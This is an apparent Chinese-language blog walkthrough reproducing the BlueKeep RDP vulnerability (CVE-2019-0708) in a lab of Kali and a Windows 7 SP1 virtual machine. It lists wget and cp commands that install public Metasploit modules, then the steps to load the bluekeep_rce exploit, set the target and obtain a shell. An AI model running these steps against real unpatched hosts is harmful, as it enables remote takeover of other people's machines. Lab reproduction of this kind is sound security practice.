CVE-2019-0708复现

先传送篇文章:CVE-2019-0708漏洞复现及修复补丁
CVE-2019-0708 远程桌面代码执行漏洞复现

在进行复现之前先对kali进行更新,这里的测试环境是kali和win7sp1(在对其他版本的win7,以及server2008都只出现蓝屏,不能对其控制)

复现过程:
1、下载在kali上下载四个脚本命令如下:

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

2、脚本复制到kali的对应位置:

cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/

cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/

cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/

cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/

3、重启数据库:
service postgresql restart
4、启动msf,然后输入命令reload_all,加载模块:
5、加载攻击模块:
在这里插入图片描述
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
在这里插入图片描述
这里的rhost是win7sp1, target 选择1
CVE-2019-0708复现_第1张图片
run一下,成功拿到shell
CVE-2019-0708复现_第2张图片

总结:
1)本次复现使用的是win7sp1,测试过win7的其他版本,以及server2008,都只是出现蓝屏。
2)几个模块第一次放到指定文件夹位置的时可能会出现问题,出现下面这个问题需要重新写入
CVE-2019-0708复现_第3张图片
3)注意这里使用的vm虚拟机,使用的target1,其他几个出现蓝屏

你可能感兴趣的:(工具使用)